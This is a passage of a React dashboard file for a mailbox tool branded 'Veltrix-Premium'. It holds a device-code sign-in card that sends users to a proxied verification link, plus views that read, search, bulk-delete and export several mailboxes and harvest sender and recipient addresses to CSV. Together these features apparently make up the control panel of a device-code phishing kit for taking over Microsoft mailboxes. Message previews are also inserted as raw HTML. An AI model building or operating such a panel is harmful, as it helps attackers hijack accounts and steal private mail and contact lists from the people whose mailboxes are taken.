              onClick={async () => {
                await syncDashboardConnections(selectedUserId || "");
                if (selectedUserId) {
                  await fetchMicrosoftStatus(selectedUserId);
                }
                addToast("Connection status refreshed", "success");
              }}
            >
              Refresh Status
            </button>
          </div>

          {deviceCodeData && (
            <div
              style={{
                width: "100%",
                display: "flex",
                alignItems: "center",
                justifyContent: "center",
                padding: "18px 0 4px",
              }}
            >
              <div
                style={{
                  width: "100%",
                  maxWidth: 720,
                  borderRadius: 24,
                  padding: 28,
                  background: isDarkMode ? "#111827" : "#ffffff",
                  border: isDarkMode
                    ? "1px solid rgba(255,255,255,0.08)"
                    : "1px solid #e5e7eb",
                  boxShadow: isDarkMode
                    ? "0 10px 40px rgba(0,0,0,0.35)"
                    : "0 10px 30px rgba(0,0,0,0.08)",
                }}
              >
                <div
                  style={{
                    display: "flex",
                    flexDirection: "column",
                    alignItems: "center",
                    textAlign: "center",
                    marginBottom: 22,
                  }}
                >
                  <img
                    src={productLogoUrl || SIDEBAR_LOGO_URL}
                    alt={BRAND_NAME}
                    style={{
                      width: 58,
                      height: 58,
                      borderRadius: 16,
                      objectFit: "cover",
                      marginBottom: 14,
                      background: "#ffffff",
                    }}
                  />

                  <div
                    style={{
                      fontSize: 28,
                      fontWeight: 800,
                      letterSpacing: -0.8,
                      color: isDarkMode ? "#ffffff" : "#111827",
                    }}
                  >
                    Veltrix-Premium
                  </div>

                  <div
                    style={{
                      marginTop: 8,
                      fontSize: 14,
                      color: isDarkMode ? "#9ca3af" : "#6b7280",
                      maxWidth: 520,
                      lineHeight: 1.5,
                    }}
                  >
                    Complete mailbox setup using the generated secure code below.
                  </div>
                </div>

                <div
                  style={{
                    width: "100%",
                    borderRadius: 18,
                    padding: "18px 20px",
                    background: isDarkMode ? "#0f172a" : "#f9fafb",
                    border: isDarkMode
                      ? "1px solid rgba(255,255,255,0.08)"
                      : "1px solid #e5e7eb",
                    marginBottom: 18,
                    textAlign: "center",
                  }}
                >
                  <div
                    style={{
                      fontSize: 13,
                      fontWeight: 700,
                      marginBottom: 10,
                      color: isDarkMode ? "#9ca3af" : "#6b7280",
                      textTransform: "uppercase",
                      letterSpacing: 1.2,
                    }}
                  >
                    Secure Setup Code
                  </div>

                  <div
                    style={{
                      fontSize: 34,
                      fontWeight: 900,
                      letterSpacing: 5,
                      color: isDarkMode ? "#ffffff" : "#111827",
                      wordBreak: "break-word",
                      fontFamily: "monospace",
                    }}
                  >
                    {deviceCodeData.user_code}
                  </div>
                </div>

                <div
                  style={{
                    display: "grid",
                    gap: 10,
                    textAlign: "center",
                    marginBottom: 18,
                  }}
                >
                  <a
                    style={{
                      ...styles.link,
                      fontWeight: 800,
                      overflowWrap: "anywhere",
                    }}
                    href={getProxiedVerificationUri()}
                    target="_blank"
                    rel="noreferrer"
                  >
                    {getProxiedVerificationUri()}
                  </a>

                  <div style={styles.inlineNote}>
                    Expires: {deviceCodeSecondsLeft !== null
                      ? `${deviceCodeSecondsLeft}s`
                      : `${deviceCodeData.expires_in || "—"}s`}
                  </div>
                </div>

                <div
                  style={{
                    display: "flex",
                    gap: 12,
                    justifyContent: "center",
                    flexWrap: "wrap",
                    marginTop: 18,
                  }}
                >
                  <a
                    style={styles.primaryButton}
                    href={getProxiedVerificationUri()}
                    target="_blank"
                    rel="noreferrer"
                  >
                    Open setup page
                  </a>
                  <CopyButton
                    value={deviceCodeData.user_code || ""}
                    label="Copy code"
                    toast={addToast}
                  />
                  <CopyButton
                    value={getProxiedVerificationUri()}
                    label="Copy link"
                    toast={addToast}
                  />
                  <button
                    style={styles.secondaryButton}
                    onClick={pollDeviceCodeFlow}
                    disabled={devicePolling}
                  >
                    {devicePolling ? "Checking..." : "Check status"}
                  </button>
                  <button
                    style={styles.secondaryButton}
                    onClick={stopDeviceAutoPolling}
                  >
                    Stop
                  </button>
                </div>

                <div
                  style={{
                    marginTop: 24,
                    padding: 18,
                    borderRadius: 16,
                    background: isDarkMode
                      ? "rgba(255,255,255,0.03)"
                      : "#f9fafb",
                    border: isDarkMode
                      ? "1px solid rgba(255,255,255,0.06)"
                      : "1px solid #e5e7eb",
                  }}
                >
                  <div
                    style={{
                      fontSize: 13,
                      fontWeight: 700,
                      marginBottom: 12,
                      color: isDarkMode ? "#ffffff" : "#111827",
                      textTransform: "uppercase",
                      letterSpacing: 1,
                      textAlign: "center",
                    }}
                  >
                    Instructions
                  </div>

                  <div
                    style={{
                      fontSize: 14,
                      lineHeight: 1.7,
                      color: isDarkMode ? "#d1d5db" : "#4b5563",
                      textAlign: "center",
                    }}
                  >
                    Open the mailbox setup page, enter the secure code,
                    then complete the authentication process.
                  </div>
                </div>

                {deviceFlowStatus && (
                  <div style={{ ...styles.inlineNote, textAlign: "center", marginTop: 14 }}>
                    {deviceFlowStatus}
                  </div>
                )}
              </div>
            </div>
          )}
        </section>

      </div>
    );
  }

  function renderOnboarding() {
    return (
      <div style={styles.sectionStack}>
        <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}) }}>
          <div style={styles.cardTitle}>Onboarding removed</div>
          
          <button
            style={styles.primaryButton}
            onClick={() => setActiveNav("connect")}
          >
            Go to Mailbox Connection Setup
          </button>
        </section>
      </div>
    );
  }

  function renderBackgroundExport() {
    const handleAddMailbox = (mailboxId) => {
      if (!mailboxId) return;
      setExportSelectedMailboxes(prev => {
        const newSet = new Set(prev);
        newSet.add(mailboxId);
        return newSet;
      });
      if (mailboxId) {
        fetchFoldersForMailbox(mailboxId);
      }
    };

    const handleRemoveMailbox = (mailboxId) => {
      setExportSelectedMailboxes(prev => {
        const newSet = new Set(prev);
        newSet.delete(mailboxId);
        return newSet;
      });
      setExportSelectedFolders(prev => {
        const next = { ...prev };
        delete next[mailboxId];
        return next;
      });
      setExportMailboxFolders(prev => {
        const next = { ...prev };
        delete next[mailboxId];
        return next;
      });
    };

    const handleFolderToggle = (mailboxId, folderId) => {
      setExportSelectedFolders(prev => {
        const current = prev[mailboxId] || [];
        const newSet = new Set(current);
        if (newSet.has(folderId)) {
          newSet.delete(folderId);
        } else {
          newSet.add(folderId);
        }
        return { ...prev, [mailboxId]: Array.from(newSet) };
      });
    };

    const handleSelectAllFolders = (mailboxId, folderList) => {
      setExportSelectedFolders(prev => ({
        ...prev,
        [mailboxId]: folderList.map(f => f.id),
      }));
    };

    const handleStartExport = () => {
      const selections = [];
      const startDate = new Date(exportStartYear, exportStartMonth - 1, 1);
      const endDate = new Date(exportEndYear, exportEndMonth - 1, 1);
      endDate.setMonth(endDate.getMonth() + 1);
      endDate.setDate(endDate.getDate() - 1);

      const startISO = startDate.toISOString().split('T')[0];
      const endISO = endDate.toISOString().split('T')[0];

      for (const mailboxId of exportSelectedMailboxes) {
        const folderIds = exportSelectedFolders[mailboxId] || [];
        if (folderIds.length > 0) {
          selections.push({ user_id: mailboxId, folder_ids: folderIds });
        }
      }

      if (selections.length === 0) {
        addToast("Select at least one mailbox with folders", "warning");
        return;
      }

      startBackgroundExport(selections, {
        max_messages: 0,
        start_date: startISO,
        end_date: endISO,
      });
    };

    const allMailboxes = (() => {
      const map = new Map();
      availableUsers.forEach(u => map.set(u, { user_id: u, label: u }));
      activeResultUsers.forEach(u => {
        if (u.user_id) map.set(u.user_id, { user_id: u.user_id, label: u.label || u.user_id });
      });
      return Array.from(map.values());
    })();

    return (
      <div style={styles.sectionStack}>
        <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}) }}>
          <div style={styles.cardTitle}>Background Export (Multi-Mailbox, Multi-Folder)</div>
          <div style={styles.cardSubtitle}>
            Select multiple mailboxes and, for each, choose which folders to export.
            The export runs in the background; you can monitor progress in the Background Jobs panel.
            When complete, a ZIP file with separate CSV files per mailbox/folder will be available for download.
          </div>

          <div style={{ display: "grid", gap: 12, marginTop: 8 }}>
            <div>
              <label style={styles.label}>Select mailboxes</label>
              <div style={{ display: "flex", gap: 8, flexWrap: "wrap" }}>
                <select
                  style={{ ...styles.select, minWidth: 200 }}
                  onChange={(e) => handleAddMailbox(e.target.value)}
                  value=""
                >
                  <option value="">Add a mailbox...</option>
                  {allMailboxes
                    .filter(m => !exportSelectedMailboxes.has(m.user_id))
                    .map(m => (
                      <option key={m.user_id} value={m.user_id}>{m.label}</option>
                    ))}
                </select>
              </div>
            </div>

            <div style={{ display: "grid", gap: 8, maxHeight: 400, overflowY: "auto" }}>
              {Array.from(exportSelectedMailboxes).map(mailboxId => {
                const folderList = exportMailboxFolders[mailboxId] || [];
                const selectedFolderIds = exportSelectedFolders[mailboxId] || [];
                const loading = exportFolderLoading[mailboxId] || false;

                return (
                  <div key={mailboxId} style={{ ...styles.infoCard, padding: 12 }}>
                    <div style={{ display: "flex", justifyContent: "space-between", alignItems: "center" }}>
                      <strong>{mailboxId}</strong>
                      <button
                        style={styles.dangerButton}
                        onClick={() => handleRemoveMailbox(mailboxId)}
                      >
                        Remove
                      </button>
                    </div>
                    <div style={{ marginTop: 6 }}>
                      <label style={{ fontSize: 12, fontWeight: 700 }}>Select folders</label>
                      {loading ? (
                        <div style={styles.inlineNote}>Loading folders...</div>
                      ) : folderList.length === 0 ? (
                        <div style={styles.inlineNote}>No folders found or load failed.</div>
                      ) : (
                        <div style={{ display: "flex", flexWrap: "wrap", gap: 6, marginTop: 4 }}>
                          {folderList.map(f => (
                            <label key={f.id} style={{ display: "flex", alignItems: "center", gap: 4, fontSize: 12, cursor: "pointer" }}>
                              <input
                                type="checkbox"
                                checked={selectedFolderIds.includes(f.id)}
                                onChange={() => handleFolderToggle(mailboxId, f.id)}
                              />
                              {f.name}
                            </label>
                          ))}
                        </div>
                      )}
                      {folderList.length > 0 && (
                        <div style={{ marginTop: 6 }}>
                          <button
                            style={{ ...styles.secondaryButton, padding: "4px 10px" }}
                            onClick={() => {
                              const allIds = folderList.map(f => f.id);
                              const current = exportSelectedFolders[mailboxId] || [];
                              if (current.length === allIds.length) {
                                setExportSelectedFolders(prev => ({ ...prev, [mailboxId]: [] }));
                              } else {
                                setExportSelectedFolders(prev => ({ ...prev, [mailboxId]: allIds }));
                              }
                            }}
                          >
                            {selectedFolderIds.length === folderList.length ? "Deselect all" : "Select all"}
                          </button>
                        </div>
                      )}
                    </div>
                    <div style={{ marginTop: 4, fontSize: 12, color: "#667085" }}>
                      Selected: {selectedFolderIds.length} folder(s)
                    </div>
                  </div>
                );
              })}
            </div>

            <div style={styles.compactGrid2}>
              <div>
                <label style={styles.label}>Start Month</label>
                <div style={{ display: "flex", gap: 8 }}>
                  <select style={styles.select} value={exportStartMonth} onChange={(e) => setExportStartMonth(Number(e.target.value))}>
                    {Array.from({ length: 12 }, (_, i) => i + 1).map(m => (
                      <option key={m} value={m}>{m}</option>
                    ))}
                  </select>
                  <select style={styles.select} value={exportStartYear} onChange={(e) => setExportStartYear(Number(e.target.value))}>
                    {Array.from({ length: 10 }, (_, i) => new Date().getFullYear() - i).map(y => (
                      <option key={y} value={y}>{y}</option>
                    ))}
                  </select>
                </div>
              </div>
              <div>
                <label style={styles.label}>End Month</label>
                <div style={{ display: "flex", gap: 8 }}>
                  <select style={styles.select} value={exportEndMonth} onChange={(e) => setExportEndMonth(Number(e.target.value))}>
                    {Array.from({ length: 12 }, (_, i) => i + 1).map(m => (
                      <option key={m} value={m}>{m}</option>
                    ))}
                  </select>
                  <select style={styles.select} value={exportEndYear} onChange={(e) => setExportEndYear(Number(e.target.value))}>
                    {Array.from({ length: 10 }, (_, i) => new Date().getFullYear() - i).map(y => (
                      <option key={y} value={y}>{y}</option>
                    ))}
                  </select>
                </div>
              </div>
            </div>

            <div style={styles.buttonRow}>
              <button style={styles.primaryButton} onClick={handleStartExport}>
                Start Background Export
              </button>
            </div>

            <div style={styles.inlineNote}>
              The export will run in the background. Monitor progress in the "Background Jobs" panel below.
              When complete, a download button will appear to get the ZIP file.
            </div>
          </div>
        </section>

        {renderBackgroundJobsPanel()}
      </div>
    );
  }

  function renderBackgroundJobs() {
    return (
      <div style={styles.sectionStack}>
        <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}) }}>
          <div style={styles.cardHeaderCompact}>
            <div>
              <div style={styles.cardTitle}>Background Jobs</div>
              <div style={styles.cardSubtitle}>Monitor all running and completed background tasks.</div>
            </div>
            <button style={styles.secondaryButton} onClick={fetchBackgroundJobs}>Refresh</button>
          </div>
          {renderBackgroundJobsPanel("")}
        </section>
      </div>
    );
  }

  function renderMail() {
    const formatMailDate = (value) => {
      if (!value) return "";
      try {
        const d = new Date(value);
        if (Number.isNaN(d.getTime())) return String(value);
        return d.toLocaleString([], {
          month: "short",
          day: "numeric",
          hour: "numeric",
          minute: "2-digit",
        });
      } catch {
        return String(value);
      }
    };

    const senderLabel = (value) => getSenderName(value);
    const senderEmail = (value) => getSenderEmail(value);
    const senderInitial = (value) => senderLabel(value).charAt(0).toUpperCase();

    const attachmentIconFor = (attachment) => {
      const contentType = String(attachment?.contentType || "").toLowerCase();
      const name = String(attachment?.name || "").toLowerCase();
      if (contentType.startsWith("image/") || name.endsWith(".svg")) return "🖼";
      if (contentType === "application/pdf" || name.endsWith(".pdf")) return "📕";
      if (name.endsWith(".doc") || name.endsWith(".docx")) return "📘";
      if (name.endsWith(".html") || name.endsWith(".htm")) return "🌐";
      return "📎";
    };
    const canPreviewAttachment = (attachment) => {
      const contentType = String(attachment?.contentType || "").toLowerCase();
      const name = String(attachment?.name || "").toLowerCase();
      return (
        contentType.startsWith("image/") ||
        contentType === "application/pdf" ||
        contentType === "image/svg+xml" ||
        contentType === "text/html" ||
        contentType.startsWith("text/") ||
        name.endsWith(".pdf") ||
        name.endsWith(".svg") ||
        name.endsWith(".html") ||
        name.endsWith(".htm")
      );
    };
    const currentMessageDate = formatMailDate(
      selectedEmail?.receivedDateTime || selectedEmail?.sentDateTime || selectedEmail?.date
    );

    const toggleMessageSelection = (id) => {
      setSelectedMessageIds(prev =>
        prev.includes(id) ? prev.filter(i => i !== id) : [...prev, id]
      );
    };

    const selectAllMessages = (select) => {
      if (select) {
        setSelectedMessageIds(emails.map(e => e.id));
      } else {
        setSelectedMessageIds([]);
      }
    };

    const bulkDeleteMessages = async () => {
      if (!selectedMessageIds.length) return;
      confirm("Bulk delete", `Delete ${selectedMessageIds.length} selected messages permanently?`, async () => {
        try {
          const res = await fetchWithAuth(`${API}/emails/bulk/delete`, {
            method: "POST",
            headers: { "Content-Type": "application/json" },
            body: JSON.stringify({ user_id: selectedUserId, message_ids: selectedMessageIds }),
          });
          const data = await res.json();
          if (!res.ok) throw new Error(data.detail || "Bulk delete failed");
          setEmails(prev => prev.filter(e => !selectedMessageIds.includes(e.id)));
          setSelectedMessageIds([]);
          addToast(`${selectedMessageIds.length} messages deleted`, "success");
        } catch (err) {
          addToast(err.message || "Bulk delete failed", "error");
        }
      });
    };

    const bulkMoveMessages = async () => {
      if (!selectedMessageIds.length) return;
      if (!selectedMoveFolderId) {
        addToast("Select a destination folder first", "warning");
        return;
      }
      try {
        const res = await fetchWithAuth(`${API}/emails/bulk/move`, {
          method: "POST",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify({ user_id: selectedUserId, message_ids: selectedMessageIds, folder_id: selectedMoveFolderId }),
        });
        const data = await res.json();
        if (!res.ok) throw new Error(data.detail || "Bulk move failed");
        setEmails(prev => prev.filter(e => !selectedMessageIds.includes(e.id)));
        setSelectedMessageIds([]);
        addToast(`${selectedMessageIds.length} messages moved`, "success");
      } catch (err) {
        addToast(err.message || "Bulk move failed", "error");
      }
    };

    const bulkMarkRead = async (isRead) => {
      if (!selectedMessageIds.length) return;
      try {
        const res = await fetchWithAuth(`${API}/emails/bulk/read`, {
          method: "POST",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify({ user_id: selectedUserId, message_ids: selectedMessageIds, is_read: isRead }),
        });
        const data = await res.json();
        if (!res.ok) throw new Error(data.detail || "Bulk mark failed");
        setEmails(prev => prev.map(e => selectedMessageIds.includes(e.id) ? { ...e, isRead: isRead } : e));
        setSelectedMessageIds([]);
        addToast(`${selectedMessageIds.length} messages marked ${isRead ? "read" : "unread"}`, "success");
      } catch (err) {
        addToast(err.message || "Bulk mark failed", "error");
      }
    };

    const isAllSelected = emails.length > 0 && selectedMessageIds.length === emails.length;

    return (
      <div className="email-layout" style={styles.mailLayout}>
        <div className="email-list-container" style={styles.foldersPane}>
          <div style={styles.outlookPaneHeader}>
            <div>
              <div style={styles.outlookPaneTitle}>Mail</div>
              <div style={styles.outlookPaneSubtle}>{selectedUserId || "No mailbox selected"}</div>
            </div>
            <div style={styles.outlookStatusDotWrap}>
              <span
                style={{
                  ...styles.outlookStatusDot,
                  background: inboxConnected ? "#12b76a" : "#f04438",
                }}
              />
            </div>
          </div>

          <button
            style={{
              ...styles.outlookFolderButton,
              ...(currentFolderId === null ? styles.outlookFolderButtonActive : {}),
            }}
            onClick={() => {
              setCurrentFolderId(null);
              loadEmails(null);
            }}
            disabled={!inboxConnected}
          >
            <span style={styles.folderIcon}>📥</span>
            <span style={styles.folderName}>All Mails Combined</span>
            <span style={styles.folderCount}>{emails.length || ""}</span>
          </button>

          {!inboxConnected ? (
            <div style={styles.outlookEmptyPanel}>
              <div style={styles.outlookEmptyIcon}>✉️</div>
              <div style={styles.outlookEmptyTitle}>Mailbox not connected</div>
              <div style={styles.outlookEmptyText}>Connect a mailbox to view folders and messages.</div>
            </div>
          ) : (
            <div style={styles.outlookFolderList}>
              {folderTree && folderTree.length > 0 ? (
                renderFolderTree(folderTree)
              ) : (
                folders.map((f) => (
                  <button
                    key={f.id}
                    style={{
                      ...styles.outlookFolderButton,
                      ...(currentFolderId === f.id ? styles.outlookFolderButtonActive : {}),
                    }}
                    onClick={() => {
                      setCurrentFolderId(f.id);
                      loadEmails(f.id);
                    }}
                  >
                    <span style={styles.folderIcon}>▣</span>
                    <span style={styles.folderName}>{f.name}</span>
                    {!!f.unreadItemCount && <span style={styles.folderUnread}>{f.unreadItemCount}</span>}
                  </button>
                ))
              )}
            </div>
          )}
        </div>

        <div className="email-list-container" style={styles.messagesPane}>
          <div style={styles.outlookListHeader}>
            <div>
              <div style={styles.outlookPaneTitle}>{selectedFolderName}</div>
              <div style={styles.outlookPaneSubtle}>{emails.length} messages loaded{mailSearchAttachmentsOnly ? " • attachments only" : ""}</div>
            </div>
            <div style={styles.outlookHeaderActions}>
              <button
                style={styles.outlookCommandButton}
                onClick={() => exportEmailAddressesCsv({ user_id: selectedUserId, folder_id: currentFolderId })}
                disabled={!selectedUserId || !inboxConnected}
                title="Export sender and recipient addresses from the selected folder"
              >
                Export CSV
              </button>
              <label style={{ ...styles.inlineNote, display: "inline-flex", alignItems: "center", gap: 6 }}>
                <input
                  type="checkbox"
                  checked={false}
                  onChange={(e) => {
                    exportEmailAddressesCsv({ user_id: selectedUserId, folder_id: currentFolderId, background: e.target.checked });
                    e.target.checked = false;
                  }}
                />
                Background export (all messages)
              </label>
            <select
              style={styles.outlookCompactSelect}
              value={emailPageSize}
              onChange={(e) => {
                const nextSize = Number(e.target.value) || 100;
                setEmailPageSize(nextSize);
                setEmailNextLink("");
                setSelectedEmail(null);
                loadEmails(currentFolderId, selectedUserId, false, "");
              }}
            >
              <option value={50}>50</option>
              <option value={100}>100</option>
              <option value={250}>250</option>
              <option value={500}>500</option>
            </select>
            </div>
          </div>

          <div style={styles.outlookSearchShell}>
            <span style={styles.outlookSearchIcon}>⌕</span>
            <input
              style={styles.outlookSearchInput}
              placeholder="Search mailbox"
              value={mailSearchQuery}
              onChange={(e) => setMailSearchQuery(e.target.value)}
              onKeyDown={(e) => {
                if (e.key === "Enter") {
                  if (!mailSearchQuery.trim() && !mailSearchAttachmentsOnly) {
                    e.preventDefault();
                    return;
                  }
                  searchEmails();
                }
                if (e.key === "Escape") clearMailSearch();
              }}
              disabled={!inboxConnected || mailSearchLoading}
            />
            <label style={{ display: "inline-flex", alignItems: "center", gap: 6, fontSize: 12, fontWeight: 800, color: isDarkMode ? "#cbd5e1" : "#475467", whiteSpace: "nowrap" }}>
              <input
                type="checkbox"
                checked={mailSearchAttachmentsOnly}
                onChange={(e) => setMailSearchAttachmentsOnly(e.target.checked)}
                disabled={!inboxConnected || mailSearchLoading}
              />
              Attachments only
            </label>
            <label style={{ display: "inline-flex", alignItems: "center", gap: 6, fontSize: 12, fontWeight: 800, color: isDarkMode ? "#cbd5e1" : "#475467", whiteSpace: "nowrap" }}>
              <input
                type="checkbox"
                checked={mailSearchSortByDate}
                onChange={(e) => setMailSearchSortByDate(e.target.checked)}
                disabled={!inboxConnected || mailSearchLoading}
              />
              Sort by date (newest first)
            </label>
            {mailSearchQuery && (
              <button style={styles.outlookSearchClearButton} onClick={clearMailSearch} disabled={mailSearchLoading}>
                Clear
              </button>
            )}
            <button
              type="button"
              style={styles.outlookSearchButton}
              onClick={() => searchEmails()}
              disabled={!inboxConnected || mailSearchLoading}
            >
              {mailSearchLoading ? "Searching..." : "Search"}
            </button>
          </div>

          {emails.length > 0 && (
            <div style={{ padding: "8px 14px", borderBottom: isDarkMode ? "1px solid #1e293b" : "1px solid #eef2f7", background: isDarkMode ? "#111827" : "#f8fafc" }}>
              <label style={{ display: "flex", alignItems: "center", gap: 8, fontSize: 13, fontWeight: 700, color: isDarkMode ? "#cbd5e1" : "#475467", cursor: "pointer" }}>
                <input
                  type="checkbox"
                  checked={isAllSelected}
                  onChange={(e) => selectAllMessages(e.target.checked)}
                />
                Select all messages ({emails.length})
              </label>
            </div>
          )}

          {selectedMessageIds.length > 0 && (
            <div style={{ ...styles.outlookListHeader, borderBottom: "1px solid #c7d7fe", background: isDarkMode ? "#1e293b" : "#f0f5ff" }}>
              <span style={{ fontSize: 13, fontWeight: 800, color: isDarkMode ? "#dbeafe" : "#1d4ed8" }}>
                {selectedMessageIds.length} selected
              </span>
              <div style={{ display: "flex", gap: 6, flexWrap: "wrap" }}>
                <button style={styles.outlookCommandButtonDanger} onClick={bulkDeleteMessages} disabled={READ_ONLY_MODE}>
                  🗑 Delete
                </button>
                <button style={styles.outlookCommandButton} onClick={() => bulkMarkRead(true)} disabled={READ_ONLY_MODE}>
                  ✓ Mark read
                </button>
                <button style={styles.outlookCommandButton} onClick={() => bulkMarkRead(false)} disabled={READ_ONLY_MODE}>
                  ○ Mark unread
                </button>
                <div style={styles.outlookMoveSelectGroup}>
                  <select
                    style={styles.outlookMoveSelect}
                    value={selectedMoveFolderId}
                    onChange={(e) => setSelectedMoveFolderId(e.target.value)}
                    disabled={READ_ONLY_MODE || !folders.length}
                  >
                    <option value="">Move to...</option>
                    {folders.map((f) => (
                      <option key={f.id} value={f.id}>{f.name}</option>
                    ))}
                  </select>
                  <button style={styles.outlookCommandButton} onClick={bulkMoveMessages} disabled={READ_ONLY_MODE || !selectedMoveFolderId}>
                    Move
                  </button>
                </div>
                <button style={styles.outlookCommandButton} onClick={() => setSelectedMessageIds([])}>
                  Deselect all
                </button>
              </div>
            </div>
          )}

          {!inboxConnected ? (
            <div style={styles.outlookEmptyPanel}>
              <div style={styles.outlookEmptyIcon}>📭</div>
              <div style={styles.outlookEmptyTitle}>No mailbox connected</div>
              <div style={styles.outlookEmptyText}></div>
            </div>
          ) : emails.length === 0 ? (
            <div style={styles.outlookEmptyPanel}>
              <div style={styles.outlookEmptyIcon}>✓</div>
              <div style={styles.outlookEmptyTitle}>No messages</div>
              <div style={styles.outlookEmptyText}></div>
            </div>
          ) : (
            <div style={styles.messageList}>
              {emails.map((e) => {
                const isSelected = selectedEmail?.id === e.id;
                const highlightedPreview = highlightText(e.bodyPreview || e.preview || "", mailSearchQuery);
                const isChecked = selectedMessageIds.includes(e.id);
                return (
                  <button
                    key={e.id}
                    style={{
                      ...styles.outlookMessageCard,
                      ...(isSelected ? styles.outlookMessageCardSelected : {}),
                      ...(e.isRead ? {} : styles.outlookMessageCardUnread),
                      paddingLeft: 8,
                      display: "grid",
                      gridTemplateColumns: "28px 36px 1fr auto",
                      gap: 6,
                      alignItems: "start",
                    }}
                    onClick={() => {
                      openEmail(e.id);
                    }}
                  >
                    <input
                      type="checkbox"
                      checked={isChecked}
                      onChange={(ev) => {
                        ev.stopPropagation();
                        toggleMessageSelection(e.id);
                      }}
                      style={{ marginTop: 8, cursor: "pointer" }}
                    />
                    <span style={{ ...styles.messageAvatar, background: e.isRead ? "#eef2f7" : "#dbeafe", color: e.isRead ? "#475467" : "#175cd3" }}>
                      {senderInitial(e.from)}
                    </span>
                    <span style={styles.messageContent}>
                      <span style={styles.messageTopLine}>
                        <span style={styles.messageSenderName}>{senderLabel(e.from)}</span>
                        <span style={styles.messageDate}>{formatMailDate(e.receivedDateTime || e.sentDateTime || e.date)}</span>
                      </span>
                      <span style={{ fontSize: 11, color: isDarkMode ? "#94a3b8" : "#64748b", overflow: "hidden", textOverflow: "ellipsis", whiteSpace: "nowrap" }}>
                        {senderEmail(e.from)}
                      </span>
                      <span style={{ ...styles.messageSubject, display: "flex", alignItems: "center", gap: 6 }}>
                        <span style={{ minWidth: 0, overflow: "hidden", textOverflow: "ellipsis", whiteSpace: "nowrap" }}>
                          {e.subject}
                        </span>
                        {emailHasAttachment(e) && (
                          <span
                            title="Has attachment"
                            aria-label="Has attachment"
                            style={{
                              display: "inline-flex",
                              alignItems: "center",
                              justifyContent: "center",
                              flex: "0 0 auto",
                              width: 24,
                              height: 24,
                              borderRadius: "50%",
                              fontSize: 16,
                              background: isDarkMode ? "#f59e0b" : "#fff7ed",
                              color: isDarkMode ? "#111827" : "#9a3412",
                              border: isDarkMode ? "1px solid #fbbf24" : "1px solid #fed7aa",
                              boxShadow: isDarkMode ? "0 0 0 2px rgba(245,158,11,0.22)" : "none",
                            }}
                          >
                            📎
                          </span>
                        )}
                        {mailSearchQuery && (
                          <span style={{ marginLeft: 8, fontSize: 10, background: isDarkMode ? "#334155" : "#eef2f7", padding: "2px 6px", borderRadius: 999 }}>
                            {selectedFolderName}
                          </span>
                        )}
                      </span>
                      <span style={styles.messagePreview} dangerouslySetInnerHTML={{ __html: highlightedPreview }} />
                    </span>
                    {!e.isRead && <span style={styles.unreadDot} />}
                  </button>
                );
              })}
              {searchNextLink && (
                <button
                  style={styles.outlookLoadMoreButton}
                  onClick={loadMoreSearchResults}
                  disabled={searchLoadingMore}
                >
                  {searchLoadingMore ? "Loading more search results..." : "Load more search results"}
                </button>
              )}
              {!searchNextLink && emailNextLink && !mailSearchQuery && (
                <button
                  style={styles.outlookLoadMoreButton}
                  onClick={loadMoreEmails}
                  disabled={emailLoadingMore}
                >
                  {emailLoadingMore ? "Loading more messages..." : "Load more messages"}
                </button>
              )}
            </div>
          )}
        </div>

        <div className="email-reader-container" style={styles.readerPaneLarge}>
          {!inboxConnected ? (
            <div style={styles.readerEmpty}>
              <div style={styles.readerEmptyIcon}>📨</div>
              <div style={styles.readerEmptyTitle}>Connect your mailbox</div>
              <div style={styles.readerEmptyText}></div>
            </div>
          ) : selectedEmail ? (
            <>
              <div style={styles.readerCommandBar}>
                <button style={styles.outlookCommandButton} onClick={() => {
                  handleReplyClick();
                }} disabled={READ_ONLY_MODE}>
                  ↩ Reply
                </button>
                <button style={styles.outlookCommandButton} onClick={() => sendReplyAll()} disabled={READ_ONLY_MODE}>
                  ↩↩ Reply All
                </button>
                <button style={styles.outlookCommandButton} onClick={() => setShowForwardBox(!showForwardBox)} disabled={READ_ONLY_MODE}>
                  ↗ Forward
                </button>
                <button style={styles.outlookCommandButton} onClick={() => markRead(selectedEmail.id)} disabled={READ_ONLY_MODE || selectedEmail.isRead}>
                  ✓ Mark as read
                </button>
                <button style={styles.outlookCommandButton} onClick={() => markUnread(selectedEmail.id)} disabled={READ_ONLY_MODE || !selectedEmail.isRead}>
                  ○ Mark as unread
                </button>
                <button style={styles.outlookCommandButtonDanger} onClick={() => deleteEmail(selectedEmail.id)} disabled={READ_ONLY_MODE}>
                  {isDeletedItemsFolder() ? "Delete permanently" : "Delete"}
                </button>
                <div style={styles.outlookMoveSelectGroup}>
                  <select
                    style={styles.outlookMoveSelect}
                    value={selectedMoveFolderId}
                    onChange={(e) => setSelectedMoveFolderId(e.target.value)}
                    disabled={READ_ONLY_MODE || !folders.length}
                  >
                    <option value="">Move to folder...</option>
                    {folders.map((f) => (
                      <option key={f.id} value={f.id}>{f.name}</option>
                    ))}
                  </select>
                  <button
                    style={styles.outlookCommandButton}
                    onClick={() => {
                      if (!selectedMoveFolderId) {
                        addToast("Choose a destination folder first", "warning");
                        return;
                      }
                      moveEmail(selectedEmail.id, selectedMoveFolderId);
                      setSelectedMoveFolderId("");
                    }}
                    disabled={READ_ONLY_MODE || !selectedMoveFolderId}
                  >
                    Move
                  </button>
                </div>
                <button
                  style={styles.outlookCommandButton}
                  onClick={() => exportEmailAddressesCsv({ user_id: selectedUserId, folder_id: currentFolderId })}
                  disabled={!selectedUserId || !inboxConnected}
                  title="Export sender and recipient addresses from the selected mailbox folder"
                >
                  Export folder CSV
                </button>
                <button
                  style={styles.secondaryButton}
                  onClick={loadConversationOnDemand}
                  disabled={conversationLoading || !selectedEmail}
                >
                  {conversationLoading ? "Loading..." : (showConversationPanel ? "Hide conversation" : "Show conversation")}
                </button>
                <button
                  style={styles.secondaryButton}
                  onClick={fetchConversationAttachments}
                  disabled={!showConversationPanel || selectedEmailConversation.length === 0}
                >
                  📎 Attachments in conversation
                </button>
              </div>

              <div style={styles.readerHeader}>
                <div style={styles.readerSubjectLine}>{selectedEmail.subject || "(No subject)"}</div>
                <div style={styles.readerIdentityRow}>
                  <div style={styles.readerAvatarLarge}>{senderInitial(selectedEmail.from)}</div>
                  <div style={styles.readerSenderBlock}>
                    <div style={styles.readerFrom}>{senderLabel(selectedEmail.from)}</div>
